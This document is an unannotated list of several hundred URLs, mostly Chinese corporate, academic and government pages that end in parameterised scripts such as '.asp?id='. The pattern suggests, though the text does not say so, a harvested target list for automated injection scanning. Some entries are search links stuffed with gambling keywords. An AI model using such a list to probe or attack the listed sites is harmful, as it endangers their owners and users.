http://www.miyoukeji.net/view/search.php?keyword=%E7%9D%BE%E4%B8%B8%E7%82%8E http://www.mizuno.com.cn/run.aspx?SportTypeID=1 http://www.mjajzz.com/readnews.asp?newsid=1624 http://www.mjnx.org.cn/list_news.asp?id=715&sort_id=656 http://www.mkgchina.com/front/product/index.php?cata=10 http://www.mkyd.net/news/newsviewa.asp?id=769 http://www.mlctsrq.com/about.asp?id=1 http://www.mldw.gov.cn/chief/index.php?ty=182 http://www.mlfelt.com/cpzs.asp?lei=1 http://www.mlrlele.com/news_look.asp?id=186 http://www.mltrans.net/MeiLianNewsContent.aspx?nid=1198 http://www.mlzh.gov.cn/news_detail.php?cid=1&id=664 http://www.mm520mm.com/member/index_do.php?fmdo=user&dopost=regnew http://www.mmdd-china.com/Product.aspx?Classid=11 http://www.mmgy168.com/mmgy/info_article.asp?id=1490 http://www.mmjob.com.cn/zczx/sort.php?ID=1 http://www.mncyw.com/new_list.asp?id=8 http://www.mobanzhongxin.com/news_newlist1_2.asp?classid=45 http://www.mocaxishuceshiyi.com/news_detail.asp?id=83 http://www.modernde.com/magazine/Directory_Theory.aspx?MagazineID=168 http://www.modpa.org/magazineshow.asp?id=68 http://www.mogong-group.com/caseview.asp?x_pid=368 http://www.mohe-pc.com/eproduct.asp?Sele=1 http://www.moogame.com/forum.php?mod=rss&auth=0 http://www.mos.ru/authority/activity/municipal/index.php?id_14=29712 http://www.motionlaw.cn/team.asp?kxid=11 http://www.moyuantang.com/csjieshao.asp?id=2023 http://www.mq-wz.com/newsview.asp?id=721 http://www.mrhz.cn/shangpu/11963/zhaoshang_view.asp?id=24922 http://www.mrkj-led.com/pdlist.asp?id=104 http://www.msh.nnsme.com.cn/pic/user.asp?userid=52 http://www.msjhb.com/Products.aspx?BigID=1 http://www.mssccb.net/cp.asp?product_type=1 http://www.mssh001.com/sxds/Product_info.asp?id=2138 http://www.msyjchina.com/hdzs_1.asp?id=23 http://www.mtg.zp300.cn/zczx/sort.php?ID=1 http://www.mthhmmw.com/new_list.asp?id=28 http://www.mtuol.com/plus/search.php?keyword=%C3%C0%C5%AE http://www.murata-china.com/new/news_release/detail.php?ID=314 http://www.muwuz.com/articleshow_2.asp?articleID=1642 http://www.muye666.com/News.asp?id=49 http://www.mwljx.com/chanpin.asp?anclassid=71 http://www.mxgled.com/intro/gb/about.asp?id=134 http://www.mxqidong.com/about.asp?id=3 http://www.mxtour.gov.cn/Text.Asp?SortId=65 http://www.my1766.com/news_nr.aspx?id=7401 http://www.myande.com/english/gc.php?bh=6&ej=16 http://www.mydry.cn/Association/isocview.asp?id=18 http://www.myfeg.com/cp.asp?ClassID=3 http://www.mygsdq.com/En/product_info.asp?productid=152 http://www.myiqi.cn/directory_x.asp?id=2787 http://www.myirbook.com.cn/AboutUs.asp?id=1 http://www.myitit.com/news/view.asp?id=3498 http://www.myjialian.com/product_forward.asp?lmid=87 http://www.myjj028.com/include/show.asp?Cid=267&id=1556 http://www.myjkw.com/Experts_show.asp?Doctor_id=158 http://www.myqxj.com/Ask.Asp?ID=9 http://www.myxingfa.com/ggjg.asp?id=52 http://www.myzc.cn/connect.php?mod=login&op=init&referer=index.php&statfrom=login_simple http://www.myzhendongshai.com/tuku.asp?cid=25 http://www.mzhxdec.com/about_us1.asp?id=3 http://www.mzhymj.com/NewShow.asp?byID=185 http://www.mzjdwx.cn/about.asp?id=3 http://www.mzkeji.net/show.php?contentid=269 http://www.mzly.gov.cn/news.asp?typeid=38 http://ibs.bfsu.edu.cn/news-ch.php?newsid=2847 http://yxtenglong.com.cn/readjswx.asp?id=20 http://www.gist.edu.cn/gbnews_view.aspx?id=20057&infotype=1 http://ie.sdmu.edu.cn/about.asp?id=1 http://www.sztqzs.com/news.asp?BigClassID=2&SmallClassID=5 http://www.xupei.com/alltime/detail.php?detail=zuodian http://www.2341367.com/t/y/glj.asp?id=1221 http://ias.ncu.edu.cn/admin_gaoyan/show.asp?id=313 http://ceec.tju.edu.cn/news_content.php?id=6 http://www.njdkl.com/Aboutus.asp?id=22 http://en.syau.edu.cn/about/p_show.asp?D_id=709 http://www.hbsi.edu.cn/newsmore.asp?typeid=42 http://jijinhui.lixin.edu.cn/default.php?mod=article&settype=0&fid=2 http://www.tjkeyuan.cn/ArticleShow.asp?ArticleID=538 http://tw.chd.edu.cn/MemberWeb/Qita/displayBBSDetail.aspx?ID=85 http://www.chinanimalhealthcare.com/chs/info.asp?id=172 http://jobs.shanghaitech.edu.cn/job.asp?id=69 http://www.stu.sdu.edu.cn/content.php?num=7322 http://www.hnflc.cn/dongyunewslist.aspx?tname=%E5%AD%A6%E9%99%A2%E6%96%B0%E9%97%BB http://www.sdmmxh.com/sd/xh/ht.asp?id=2838 http://ae.jmu.edu.cn/listnews.asp?lm=379 http://www.chaozhu.cn/news_list.asp?id=180 http://www.cahe-as.edu.cn/xcgl/xchglfh.jsp?boardid=1401&bid2=140101&pageno=1?boardid=1401&bid2=140101&bid20=14010101&pageno=1 http://lsjyw.lnnu.edu.cn/detail.asp?id=6559 http://www.sh12351job.org/news_list.php?lm=83 http://sx.njtc.edu.cn/content1.asp?id=2582 http://yyx.slu.edu.cn/Soft/ShowSoft.asp?SoftID=18 http://www.londapc.com/computer_detail.asp?id=147 http://www.utsz.edu.cn/02platform/showNewsInfo.aspx?infoid=854 http://www.junmai123.com/contact.asp?id=51 http://xinquban.henau.edu.cn/onews.asp?id=770 http://www.fdc.zju.edu.cn/view_news.asp?newsid=689 http://cjc.sysu.edu.cn/educational.asp?Id=284 http://www.security.buct.edu.cn/category.asp?typeid=1 http://sbc.fjmu.edu.cn/news.asp?id=112&typeid=5 http://tyb.buaa.edu.cn/Course/teacher.php?id=3055 http://www.yhmsf.com/bbs/forum.php?mod=viewthread&tid=223234&extra=page%3D1 http://www.hztzgty.com/pic_info.asp?id=296 http://www.hzwomen.org.cn/wjt/wztcontent.jsp?id=1220 http://www.hzwzjs188.com/case_detail.asp?id=84 http://www.hzxingxing.com/about.asp?id=1 http://www.hzxtwl.com/fuwu.asp?f=6 http://www.hzy291.com/Readgonggao.asp?id=9 http://www.hzyczx.com/content/detail.php?sid=1&cid=200 http://www.hzyhrc.net/Person/Per_Search_Industry.aspx?Param=1 http://www.hzyn.net/news.php?cid=8 http://www.hzyndsp.com/news_x.asp?id=18 http://www.hzyxbj.com/about.asp?id=5 http://www.hzzycwgs.com/About.asp?classid=2 http://www.iainav.org/Services.php?pageSection=1&year=recent http://www.ibas-uk.com/newsPress.php?newsID=55 http://www.iccns.com/about.asp?ID=7 http://www.icmai.net/news/list.php?category=00010 http://www.ictbu.com/rss.php?auth=0 http://www.idea3600.com/aboutus.asp?id=42 http://www.idealmediallc.com/member.php?mod=register http://www.idiannaomi.com/forum.php?mod=viewthread&tid=3894&extra=page%3D1 http://www.ie.zjut.edu.cn/htm/xueyuan/down.asp?id=12&title=%E6%97%A5%E5%B8%B8%E8%A7%84%E8%8C%83 http://www.ielts.org//test_centre_search/search_results.aspx?TestCentreSearchSubRegion= http://www.ielyn.com/product.asp?MaxID=28 http://www.ies.imut.edu.cn/SchoolMate/SchoolMateList.aspx?C_ID=1117 http://www.igeek8.com/index.php?type=1 http://www.ihia.org.cn/Expertview.asp?id=98 http://www.i-iot.cn/news_2.asp?Id=113&Tid=8 http://www.iitc.com.cn/LastPageOne.aspx?CTypeID=3 http://www.iitcp.com/InfoWeb/infoManage/StageContentList.aspx?StageCategory_ID=55&Stage_ID=1 http://www.ilync.cn/course.php?id=399 http://www.ilzhx.com/zx/zx/look.asp?id=4889 http://www.imaydesign.com/dongtai.asp?type=98 http://www.imcoal-safety.gov.cn/tongjizhongxin/ShowArticle.asp?ArticleID=1828 http://www.immi.gov.au/About/Pages/detention/about-immigration-detention.aspx?tab=3&heading=immigration-detention-and-community-statistics http://www.impandexp.com/rss.php?auth=0 http://www.importfood.net/agent/xxpro.asp?id=485 http://www.importfoods.net/infos_.asp?id=126 http://www.imspcn.com/dynWeb.asp?dataID=27 http://www.ina.so/about.asp?id=44 http://www.in-ca.org/show.asp?Newsid=367 http://www.indianpharma.in/insideintbizzopp.php?bizzid=17&userid=2126 http://www.infoo.com.cn/wzgn.asp?id=62 http://www.ingenic.cn/cn/cn/industry.php?fid=801 http://www.ini3e.com/forum.php?mod=misc&action=nav http://www.in-minglun.com/about.aspx?id=167 http://www.inswaken.com/menuinfo.php?mId=23 http://www.ioesse.com/ShowNews.asp?ID=284 http://www.ionly.com.cn/nbo/zhanlan/searchvideo.aspx?keyword=%E5%8C%97%E4%BA%AC%E8%89%BA%E9%97%A8 http://www.ioscnc.com/product.asp?rid=56 http://www.iotts.net/show.asp?id=35 http://www.ioudj.com/forum.php?gid=65 http://www.iovweek.com/plus/search.php?lang=gb2312&keyword=%B3%B5%C1%AA%CD%F8&searchbt= http://www.ipadown.com/search.php?t=ios&keyword=%E4%B8%96%E7%95%8C%E6%9D%AF http://www.ipcf6.com/send.asp?typeid=37 http://www.ipingpang.com/bbs.php?q=OC%C5%E4%BD%BA http://www.iprcn.com/IL_Lwxc_Show.aspx?News_PI=2380 http://www.iraqilogistic.com/news.php?id=10 http://www.irisfmg.com/faq.php?m=extra&n=consigli_manutenzione&cat=11 http://www.irisfmg.eu/faq.php?m=extra&n=consigli_posa&cat=13 http://www.irisfmg.it/faq.php?m=extra&n=consigli_generali&cat=1 http://www.ironrocksailing.com/Activities.asp?id=8 http://www.isimba.cn/appa/view.php?auid=1961 http://www.isoiaf.com/news_list.asp?nclass=12&ncode=0001&classname=ISO9000&mnid=5223 http://www.ispo.com.cn/news_detail.aspx?classid=0&id=2284 http://www.iss.sdu.edu.cn/index.php?m=content&c=index&a=lists&catid=27 http://www.it168.com.cn/customer_more.asp?id=1098 http://www.italina.com.cn/about.php?sortid=149 http://www.ite68.cn/newview.asp?nid=30037 http://www.itstarcom.com/about.asp?classid=1 http://www.iwei2.com/photo.php?type=52 http://www.ixvx.com/chinese/main/article_view.asp?ACID=1&AID=17 http://www.izle.tv/radyokategori_2.asp?kid=40 http://www.j4006.com/news_gonggao.asp?id=28 http://alumni.bjtu.edu.cn/about3.aspx?chid=37 http://mcgovern.med.tsinghua.edu.cn/news.php?xid=2&cid=41 http://bioplastdepuracion.com/index.php?lang=2 http://yntw.net/NewsShow.asp?ListId=43100 http://swjsxyold.swu.edu.cn/show/show.php?id=2044 http://bwc.wtc.edu.cn/picnews.asp?id=22 http://www.zibotcsb.com/about.asp?id=1 http://zkzs.nau.edu.cn/1/sm.asp?id=1 http://www.cnbnge.com/productshow.asp?cid=722 http://www.msme.cn/Intro.asp?id=54 http://www.hslztb.com/xwshow.asp?id=691 http://www.xftyn.com/news2content.asp?ID=62 http://shkxc.hebtu.edu.cn/bks_in.asp?NewsId=1404 http://ime.pim.tsinghua.edu.cn/news_view.asp?id=51 http://sl.zjiet.edu.cn/article_list.asp?pageid=1 http://xnldjt.ynnu.edu.cn/articleview.aspx?id=439 http://jgxy.huat.edu.cn/jwjx2.asp?bigclassid=39 http://hqjt.haust.edu.cn/detail_not.asp?id=273 http://wxy.ahu.edu.cn/download_show.asp?id=380 http://www.tuanerwang.com/tuan/Product_info.asp?id=2233 http://job.xpu.edu.cn/displaymore.asp?lanmu=%E5%B0%B1%E4%B8%9A%E7%83%AD%E7%82%B9 http://sem.shanghaitech.edu.cn/en/news.asp?id=874 http://qzlx.hue.edu.cn/index.php?action=list&id=91 http://xlzx.huat.edu.cn/xlbk.asp?bigclassid=46 http://sxc.zjc.edu.cn/photolist.asp?classid=7 http://xywhjs.lsnu.edu.cn/cgbz_showid.asp?cgId=6 http://www.rsc.tzc.edu.cn/gsg/more.asp?boardid=10 http://gkpj.scnu.edu.cn/NewsPress.aspx?tid=1 http://sw.wtc.edu.cn/swxy/news.php?typeid=4 http://www.jjdry.com/custom.asp?id=91 http://www.dwgaj.gov.cn/nzcms_list_news.asp?id=728&sort_id=586 http://www.glxdsj.gov.cn/ArticleShow.asp?ArticleID=11418&sort=133 http://www.zhixi.gov.cn/list.asp?btype=%D0%C2%CE%C5%B6%AF%CC%AC&ctype=2 http://www.tlyz.gov.cn/showall.asp?n=%E4%B8%93%E9%A2%98%E4%B8%93%E6%A0%8F&table=tzt&fID=36 http://my.sckjcg.gov.cn/NewsMore.jsp?pCategoryCode=07&CategoryCode=0701 http://www.changyang.jcy.gov.cn/news.asp?partid=12&classid=12&id=577 http://wjj.xinhui.gov.cn/lanmu/openfile2.jsp?tablename=yijianjianyi&id=3&biaoti=%E4%BF%A1%E6%81%AF%E5%8F%8D%E9%A6%88 http://www.zgyjrd.gov.cn/news_show.asp?id=1137 http://www.lyxfw.gov.cn/lyz.jsp?urltype=tree.TreeTempUrl&wbtreeid=1220 http://yqzx.hnziyang.gov.cn/dwxinxi.aspx?id=180 http://www.lyrenda.gov.cn/links.aspx?id=17 http://wsxf.lepingshi.gov.cn/email_index.asp?DepartNo=001000000 http://www.dywgx.gov.cn/yjzjcontent.aspx?id=3455d8bc-7ca7-47ee-95b1-b9bede1a9755 http://lgj.kaiping.gov.cn/article.asp?id=793 http://www.jrzct.gov.cn/doc_list.jsp?zc_type=zcyw http://xxgk.wfbinhai.gov.cn/gknb.php?menuid=222 http://wmcj.amb.gov.cn/content.asp?lclass_ID=83&id=17366 http://jtj.snqindu.gov.cn/infoshow.asp?id=39&newsid=79 http://www.cxspb.gov.cn/Shequ.aspx?typeId=1&n=64654 http://www.bzqgt.gov.cn/Class.asp?PrdID=10 http://jsfamous.js.cei.gov.cn/cybj1.php?id=1391 http://www.tcgrain.gov.cn/list.aspx?sort=%e7%b2%ae%e6%b2%b9%e7%a7%91%e6%99%ae http://www.sdbzgyyq.gov.cn/mailbox.php?feedback_type=1 http://www.chgsj.gov.cn/zmhd.asp?id=3 http://www.tssfj.gov.cn/webui/Article_content.aspx?cid=956 http://olds.scpc.gov.cn/Nav_hudongjiaoliu_yldc.asp?SS_ID=334&VoteID=124 http://www.sxsfxz.gov.cn/article.jsp?articleid=4378 http://www.wldjw.gov.cn/wz.asp?id=24 http://sp-sipac.gov.cn/gzjd/detail.aspx?id=1 http://www.cfsszx.gov.cn/classinfo.asp?class=134 http://www.tgsqjjjc.gov.cn/article.php?MsgId=92913 http://nw.nova.gov.cn/qyfcdt.aspx?id=20110530091655278768 http://ly.bjpop.gov.cn/hd/zxtx_show.asp?sid=110 http://www.bzsly.gov.cn/brow.asp?classid=4 http://invest.dyzw.gov.cn/Enterprise_List.asp?AgencyID=1 http://www.smegz.gov.cn/web/assembly/action/browsePage.do?channelID=1106368053173&contentID=1366381158396 http://www.xmipo.gov.cn/bsznShow.aspx?NewsId=77 http://www.htwj.gov.cn/detail.asp?type_id=3&stype_id=3&id=453 http://www.btjyrd.gov.cn/news_xwsd.asp?ClassID=14 http://www.asdjj.gov.cn/news.asp?id=26 http://www.xjtsq.gov.cn/list.jsp?urltype=tree.TreeTempUrl&wbtreeid=1006 http://www.xzetdz.gov.cn/faceshow.asp?ID=288&ClassID=BX08041410575245 http://web.slpop.gov.cn/content.do?method=sendTo&cid=106 http://www.lzqq.gov.cn/article_guest.asp?guestid=18 http://www.whyz.gov.cn/readnews.php?class=%E8%B5%84%E6%96%99%E4%B8%8B%E8%BD%BD&subclass=%E8%B5%84%E6%96%99%E4%B8%8B%E8%BD%BD http://www.qhdkjj.gov.cn/showpar.jsp?mas7awqiq09kqiylif5sadm=50&v=jc_lm&zt= http://www.chlsj.gov.cn/zmhd.asp?id=10 http://www.xilin.gov.cn/app/online/PageView.jsp?id=794850e035fc11e3832af80f41f81b9d http://smz.yantai.gov.cn/xxxx.aspx?xxxxB0110=037006000482&sign=1&B0110=037006 http://zfbz.10.gov.cn/about.asp?smallclassid=317 http://www.jxdcn.gov.cn/cg_left.asp?id=1 http://www.meihaowu.com/domain.asp?name=yijiahao.com http://www.dlszwy.com/info.asp?id=174 http://szpxjtj.cn/kwd.php?id=378 http://www.ccsylh.com/info.php?class=1 http://nmc.gov.cn/cms/article.php?articleId=61 http://xck91.com/plus/search.php?q=%E8%B5%8C%E7%90%83%E7%BD%91%E9%AB%98%E5%B0%94%E5%A4%AB%E5%A8%B1%E4%B9%90%E5%9C%BA http://www.gzctsm168.com/cpzxshow.aspx?x_id=12 http://www.suihua.gov.cn/qybs/qybslist.aspx?articletypeid=bb95dd5a-c0d2-4f9d-bac4-89ad80b7705f http://m.ypbxygw.gov.cn/list.asp?type=2&c=20107895055150 http://www.realestate.cei.gov.cn/110/zxbr.aspx?id=201472464308 http://www.cdjngy.com/pro.asp?Cid=133 http://www.hecom.gov.cn/gcjs/List.aspx?id=108 http://www.sbtgj.com/product_detail.asp?id=2580 http://www.xzlpc.com/class.asp?lx=big&anid=5 http://jydylc739.com/kwd.php?id=317/ http://www.xfj.suzhou.gov.cn/news.asp?selectclassid=010001 http://www.hasrat.cn/kino_tur.php?tur=44 http://www.sdfgjg.com/listhyzx.asp?id=322375 http://www.gsdbjob.gov.cn/search_result.aspx?hyid=%E6%9C%BA%E6%A2%B0%E3%80%81%E6%9C%BA%E7%94%B5%E3%80%81%E4%BB%AA%E8%A1%A8%E7%B1%BB http://www.knowlogy.com/about_us/postDetails.aspx?id=6 http://www.ahbbjjjc.gov.cn/article.php?MsgId=90652 http://www.hzhdgb.com/ProductShow.asp?ID=138 http://guilin.net/tour/China/ShowClass.asp?ClassID=75 http://www.zzsz.gov.cn/dgtwenjian.asp?articleid=96 http://www.dgxh168.com/conx.asp?id=72 http://www.yzlzdq.com/company.asp?id=2 http://jz.dqjsj.gov.cn/bigclass.asp?typeid=15&bigclassid=32 http://www.czjtj.gov.cn/ShowNews.asp?id=3170 http://www.ypsgy.com/pshow.asp?ClassID=8&id=114 http://www.hshzkb.com/city_index.aspx?city=shenzhen http://www.secri.gov.cn/index.php?mod=intro&articleid=1 http://www.hsheiji.com/news_more.asp?id=155 http://www.yinfei56.com/contact.asp?id=401 http://www.cdlcly.com/city_index.aspx?city=sichuan http://www.fydzb.com/product.asp?BigClassId=1 http://www.gz-hk.com/Brand.asp?aid=3 http://www.led-guanhong.com/xinwen/news2.asp?ID=750 http://haayyl.si.gov.cn/list.asp?id=5553 http://www.kk90.net/plus/search.php?q=%E9%98%B3%E5%85%89%E5%BF%83%E6%80%81%E5%BF%83%E5%BE%97%E4%BD%93%E4%BC%9A http://www.xinzhen168.com/about.asp?id=37 http://www.chjjkfq.gov.cn/view.asp?id=544&cid=115 http://www.nbet.cn/Recruitdetail.aspx?psn=JP2400 http://www.weather.gov.cn/cms/article.php?articleId=61 http://www.zyhospital.cn/plus/search.php?q=%D6%D0%B6%FA%D1%D7&searchtype=title http://www.monsitegratuit.com/dossiers/article.php?new=15 http://www.660123.com/rss.php?auth=0 http://www.sxtcrd.gov.cn/News.aspx?id=11&oid=1 http://www.jcxinxi.com/plug/tags.asp?tag=%E5%A4%AA%E9%98%B3%E5%9F%8E%E5%A8%B1%E4%B9%90%E7%BD%91%E7%AB%99 http://www.15895595058.net/bigSortProduct.asp?bigid=116 http://www.hulupf.com/adproduct.asp?id=98 http://www.talent-chemical.com/newskx1.asp?newid=1013 http://www.zhongguomeishubao.com/portals/default/aboutus.aspx?catalog_id=e55ac147ca2842c8aec52d3c3bf28aeb http://www.yfyjhg.com/News_detail.asp?id=375 http://www.lgfy.com/about.asp?id=7 http://www.cx0839.com/news/comment.aspx?Nid=890 http://www.jslirong.com/en/news_view.asp?id=46 http://www.yzssdfg.com/city_index.aspx?city=shandong http://www.ykff.gov.cn/about.asp?id=1 http://jsyineng.com/productdetail.php?id=77 http://www.cngbol.net/Industry/default.aspx?ModuleNo=0304 http://www.cn3519.com/News_view.asp?NewsID=742 http://www.bxgwdlfm.com/cpdis.asp?id=1170 http://zywlyy.cn/nj-lyb-1.asp?id=13896 http://www.jnkgsk.com/info.asp?id=1 http://www.cn148.org/List.aspx?class1=100&class2=103 http://www.xmhctz.com/activities_info.aspx?News_Id=248&CateId=6 http://yongding.com.cn/company.aspx?Baseinfoid=4 http://hb.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://www.lccichina.com/content.asp?id=100 http://www.sdxnw.gov.cn/document_show.asp?id=76159&mark=101 http://www.lfydfh.com/city_index.aspx?city=tianjin http://qdykyul.cn/kwd.php?id=800 http://www.rentalpulse.com/Archives/ArchivedIssue.aspx?m=7&y=2014&d=6 http://160w.net/bbs/list.asp?classid=1228&sid=-0 http://www.wxqxmj.com/city_index.aspx?city=wuxi http://www.tsinghuaguoxue.cn/common.asp?id=1 http://www.jienengmo.com/jien/info_article.asp?id=1786&type=%E4%BE%9B%E6%B1%82%E4%BF%A1%E6%81%AF http://www.fjzzrd.gov.cn/web/cwhgk.asp?LMid=25 http://www.ruanjianbbs.com/plus/search.php?q=%E9%83%91%E5%AE%B9%E5%92%8C http://www.chinarehh.com/house/news/item.php?houseid=27&itemid=187 http://www.bincheng.gov.cn/bc/sites/main/jyxc2.jsp?TID=20110915155125400552039 http://wxxxtc.com/news.asp?lt=25 http://www.bm0392.com/adindex.asp?shi=3 http://www.quartzcn.net/ktxx.asp?leibie=%E5%9F%B9%E8%AE%AD%E5%AD%A6%E6%A0%A1 http://www.chsajj.gov.cn/Gzdt.asp?classid=2 http://www.sh-haust.com/more_info.asp?qq=%D0%D0%D2%B5%B6%AF%CC%AC http://www.tianjinicp.com/about.asp?id=164 http://gyfzj.gzedz.gov.cn/default.php?mod=article&fid=1 http://www.cqhhedu.com/NewsClasses.asp?fenlei=%D7%CA%D1%B6%D6%D0%D0%C4&an=4&erj=4 http://www.jnlzhg.com/list.php?lmid=5 http://www.czzdpack.com/cpshow.asp?showid=363 http://www.szyoxin.com/productshow.asp?ArticleID=413 http://www.ahsxjjjc.gov.cn/article.php?MsgId=92980 http://www.kcjsj.gov.cn/news_view.asp?id=595 http://www.xiuxingtang.com/news/detail.asp?id=1 http://www.aomen-dubowangzhan.com/forum.php?mod=rss&auth=0 http://www.dlyouth.gov.cn/news_other_view.php?n_id=170&n_sel=1 http://www.lantian.gov.cn/hd_mail_view.aspx?id=2210 http://www.njmcls.com/cpzs.asp?bid=71 http://www.sqmlr.gov.cn/qlyg_web/sb.jsp?itemid=JS130000GT-QR-0001 http://www.ccqpop.gov.cn/news/lump.asp?lumpID=lx001 http://jinrong.wangjing.gov.cn/Product.aspx?tzkind=%E5%A4%9A%E6%A0%B7%E6%8B%85%E4%BF%9D http://www.halalstock.com/product.asp?pID=6377 http://www.dfltmjw.com/atlas_show.php?id=37&tid=1 http://cnxjc.cn/news.asp?nlt=8 http://www.zydrum.com/display.asp?id=934 http://www.tacourt.gov.cn/clsz.jsp?pxh=18&progbh=18&axh=2 http://www.chde.cn/feedback.aspx?tq=19 http://www.bjlemmen.com/fwxm.asp?type=FWXM2&id=29 http://www.dakunjiaju.com/city_index.aspx?city=sichuan http://maijiuwang.cn/pages.asp?pid=1 http://www.sysjtj.gov.cn/flfg_nei.asp?n_id=89 http://www.pd-scr.com/aboutus.asp?catid=1&ID=1 http://www.tangxian.gov.cn/cxtx/bumennewslist.asp?menuId=&menuCode=cxtx_bmxx&menuName=%E9%83%A8%E9%97%A8%E4%BF%A1%E6%81%AF http://www.worldfodder.com/company/huangye_detail.php?&id=86671 http://www.juxianfc.com/plus/advancedsearch.php?mid=17&q=%BA%A3%C4%C9%BC%D2%D4%B0&submit=%BF%AA%CA%BC%CB%D1%CB%F7 http://www.zzydjf.com/city_index.aspx?city=zhengzhou http://www.dqst.gov.cn/zwgk/more.php?RecNo=A01B01&SortName=%E8%A6%81%E9%97%BB http://www.csswf.cn/cf_details.asp?id=6642 http://www.sunsgrainhotel.com/page.php?id=17 http://www.rzjs.gov.cn/gonggao/E_ReadOpinion.asp?LeadMailID=751 http://www.sjzhuihe.net/about.asp?id=3 http://www.yndianlijinju.com/product.asp?lei=36&viewType=2 http://www.watertek.com/newsinfo.aspx?NewsId=1013&CateId=9 http://www.yysedu.com/about/schoolprofile.asp?tt=3 http://www.jhdlock.com/city_index.aspx?city=shenyang http://www.waterfallguilin.com/meeting_info.asp?id=51 http://nnqianfan.com/news_view.asp?id=218 http://www.gllawyer.cn/lawyer.php?BigID=2 http://www.hssxx.gov.cn/gb/index.asp?user=hssxx http://jyiss.lsz.gov.cn/GPI/index.aspx?dept=92337927 http://www.fnxww.gov.cn/news.asp?classid=72 http://www.1997fz.com/news_view.asp?id=361 http://hn.ahnw.gov.cn/aspx/zjwd.aspx?TemplateType=3&Id=FA52837B-0AF9-45AB-97EB-CCD1C33CEABF http://www.fuipackaging.com/productshow.asp?ArticleID=R9Y011PVXU http://www.yxcf.net/Big.asp?big_id=8 http://www.jinpengwood.com/info.asp?id=5 http://www.hdyg.com/baihuo.asp?id=147 http://yg.xznlw.gov.cn/list_1.asp?code=1&id=2328 http://www.lnrkw.gov.cn/newsshow.asp?ArticleID=3382 http://www.xjpi.gov.cn/index.jsp?urltype=tree.TreeTempUrl&wbtreeid=11210 http://www.xtnk120.com/about.asp?id=16 http://www.ynrdra.net/bencandy.php?fid=10&id=1885 http://zn85.net.cn/news.asp?id=21 http://www.szbsh.com/EN/listnews.asp?id=72 http://www.whasdjx.com/cp_list.asp?id=526 http://www.xhagri.gov.cn/zbft/Fangtan.asp?id=11 http://www.ctgusec.com/news_more.asp?id=1&uid=x2 http://www.cl.yn.gov.cn/list.aspx?ColumnId=48 http://www.qzrf.gov.cn/cjwtlist.aspx?t=1 http://www.linyimost.gov.cn/news/lzview.asp?NewsID=2534&classID=35 http://jb100.com/sjjb_news/List.aspx?id=3 http://www.lionfulfoundation.org/cn/ZhuanTi_Photo.aspx?PH_ID=52 http://365856.com/archives/detail.php?id=jinpai http://www.huishige.com/plus/search.php?q=%E9%BB%84%E9%87%91%E9%A6%96%E9%A5%B0 http://www.ybjks.com/Article_Class.asp?ClassID=1 http://www.zycredit.gov.cn/moreinfo.do?lm=0;1 http://woman.org.cn/cover_cat.asp?id=1 http://www.yjjj8.cn/TeaSortByDid.asp?Did=1843 http://www.stonebridge.com/author_detail.asp?id=5&name=Donald%20Richie http://www.xyxcgj.gov.cn/list.asp?sort_id=657 http://www.chinadopower.com/docc/product.asp?menu_i=4&p_c_id=603&c_id=603 http://www.bzfsmm.com/xiangxi.php?pro_id=98 http://dt.daqing.gov.cn/danji_info.asp?id=15329&t=%E5%AA%92%E4%BD%93%E7%9C%8B%E5%A4%A7%E5%90%8C http://www.zjgzb.com/list.asp?ProdId=0037 http://www.355589.com/rss.php?auth=0 http://www.djinfo.gov.cn/MarketList.aspx?code=xxfb http://www.aksrsj.gov.cn/E_Alldep.asp?start=2013-01-01&end=2014-7-26 http://www.kangzifu.com/EN/product/productData.aspx?pid=120 http://www.100m100.com/aboutus.asp?parentid=425 http://www.gb6479.com/cpshow.asp?id=46 http://www.tjha.org.cn/ViewInfo.asp?id=545&sortname=%E4%BC%9A%E5%91%98%E4%BC%81%E4%B8%9A&sortid=81 http://www.chinaat.org/about.asp?s_id=2 http://www.lqngo.gov.cn/content.asp?id=5 http://www.shsm.org.cn/detail.asp?id=26191 http://www.yingquan.gov.cn/zmhd/live_view.php?lid=156 http://www.yalaba.com/kino/content.php?id=624 http://www.sdkendeji8.com/info.asp?id=1 http://www.zastny.com/info.asp?id=36 http://www.ahczly.gov.cn/hdcy/zxzx_show.jsp?ID=39 http://www.dhjs.gov.cn/Detail1.asp?classid=1 http://www.fdslbyq.com/cp.asp?class=001 http://www.lxwzj.com/product.asp?class=1&classname=%E5%85%A8%E8%87%AA%E5%8A%A8%E6%95%B0%E6%8E%A7%E5%BC%AF%E5%AD%97%E6%9C%BA http://www.qzgjj.gov.cn/gjj/news.asp?id=41 http://www.hymn.cn/en/about_detail.asp?type_id=10&id=11 http://www.yydpc.gov.cn/Default3.aspx?guid=82629da6-9ef5-4ebb-9a4a-c9de8700c534 http://www.pyjcl.com/city_index.aspx?city=guangzhou http://www.dire365.com/info.php?n=2&id=1 http://www.cevtc.com/list.asp?id=627 http://www.xywdhs.com/newshow.asp?id=232&mnid=7777&classname=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81&uppage=news.asp http://www.fenxi.gov.cn/Fxzt.asp?ClassID=253 http://www.ytsuliao.com/info.asp?id=1 http://mzj.nc.gov.cn/articledisp.aspx?infoid=3373 http://crei.cei.gov.cn/110/zxbr.aspx?id=201472464308 http://www.scfuture.com/Aboutus.php?categoryid=13&id=6 http://www.zjjfw.cn/search.php?chid=4&caid=2&letter=A http://www.wljx.gov.cn/About.asp?ID=26 http://www.queshan.gov.cn/xxpt/onews.asp?id=28 http://www.chinatdt.cn/productshow.asp?lt=283 http://www.qydjw.gov.cn/itoa_view.asp?id=24 http://www.jnbj0531.com/news.asp?id=325 http://www.jnjex.com/list.asp?flag=news&type=rdxw http://bbs.tjlottery.gov.cn/rss.php?auth=0 http://www.990lp.com/article.php?id=60 http://www.nmgsft.gov.cn/tpxw/pic_detail.asp?id=130 http://tzgymdn.cn/kwd.php?id=190 http://www.0512logo.com/about.asp?id=990&file=%E5%85%AC%E5%8F%B8%E4%BF%A1%E6%81%AF&title=%E5%85%B3%E4%BA%8E%E6%88%91%E4%BB%AC http://www.dtxs.cn/article.asp?sortid=14&id=2497 http://www.yzjjjc.gov.cn/article.php?MsgId=91080 http://www.joind.gov.cn/kjcx1/kjrc-a-2.asp?id=673 http://www.sctggs.com/news_detail.asp?id=229&fenlei=%E5%B7%A5%E7%A8%8B%E4%B8%9A%E7%BB%A9 http://www.988114.net/cominfo.asp?Id=1193 http://www.cdpop.gov.cn/redirect.jsp?id=348941 http://www.0523game.com/forum.php?mod=rss&auth=0 http://www.oufusi.cn/eproducts_all.asp?pro_type=77 